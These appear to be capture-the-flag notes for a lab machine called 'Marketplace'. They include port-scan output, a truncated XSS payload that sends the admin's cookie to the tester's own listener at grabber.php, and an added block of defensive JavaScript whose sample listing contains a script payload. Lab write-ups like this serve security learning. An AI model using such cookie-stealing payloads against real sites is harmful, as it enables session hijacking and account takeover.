
Marketplace

The document details the results of a port scan on the IP address 10.10.166.219 using RustScan, revealing open ports for SSH, HTTP, and a Node.js application. It also discusses initial access attempts, highlighting the effectiveness of XSS for stealing admin cookies to access restricted pages. Additionally, it mentions potential exploits for privilege escalation and provides links to further resources.

Uploaded by

repilex959
Marketplace

Initial Scan
root@ip-10-10-112-185:~# rustscan -a 10.10.166.219 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.166.219:22
Open 10.10.166.219:80
Open 10.10.166.219:32768
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
| ssh-hostkey:
| 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLj5F//uf40JILlSfWp95GsOiu
| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAy

| 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA2ol/CJc6HIWgvu6KQ7lZ6WWgN
80/tcp open http syn-ack nginx 1.19.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open http syn-ack Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

🚨 Tried to do a lot of stuff: XSS, JSON web tokens, SQL injections. But the
XSS works the best. There is a page only admin can access; if I can steal
the admin cookie with the XSS, I would be able to access the admin page.

<script>document.location='http://10.10.112.185:8000/XSS/grabber.php?c='+doc
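
The defensive counterpart to the note above, as an added example that is not part of the original notes or the application's code: user-submitted listing fields are HTML-encoded on output so injected markup renders as text, and the session cookie and CSP headers limit what a script could reach if one did get through. The function names, the `session` cookie name and the sample listing are assumptions.

```javascript
// Added defensive example; names and sample data are assumptions, not the app's code.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for HTML element content and quoted attribute values.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Headers sent when the session is issued (hypothetical cookie name "session").
function sessionHeaders(token) {
  const cookie = [
    `session=${encodeURIComponent(token)}`,
    'Path=/',
    'HttpOnly',        // not readable through document.cookie
    'Secure',          // only sent over HTTPS, so the site must be served over TLS
    'SameSite=Strict', // not attached to cross-site requests
  ].join('; ');
  return { 'Set-Cookie': cookie };
}

// Headers and body for a listing page built from user-submitted fields.
function renderListing(listing) {
  const headers = {
    'Content-Type': 'text/html; charset=utf-8',
    // No 'unsafe-inline': an inline <script> that slips through is not executed.
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
  const body =
    '<!doctype html><html><body>' +
    `<h1 title="${escapeHtml(listing.title)}">${escapeHtml(listing.title)}</h1>` +
    `<p>${escapeHtml(listing.description)}</p>` +
    '</body></html>';
  return { headers, body };
}

// Constructed sample: a listing whose fields carry markup instead of plain text.
const SAMPLE_LISTING = {
  title: 'Laptop" onmouseover="x',
  description: "<script>document.location='//collector.invalid/'</script>",
};

const page = renderListing(SAMPLE_LISTING);
console.log(page.body);
console.log(sessionHeaders('constructed-token-value')['Set-Cookie']);
```

Output encoding is the primary fix; `HttpOnly` and the CSP are the layers that keep the session cookie out of reach if an encoding call is ever missed.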

Privilege Escalation

🚨
Further Enumeration

🚨
Creds
Services User names Passwords

Exploits links
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
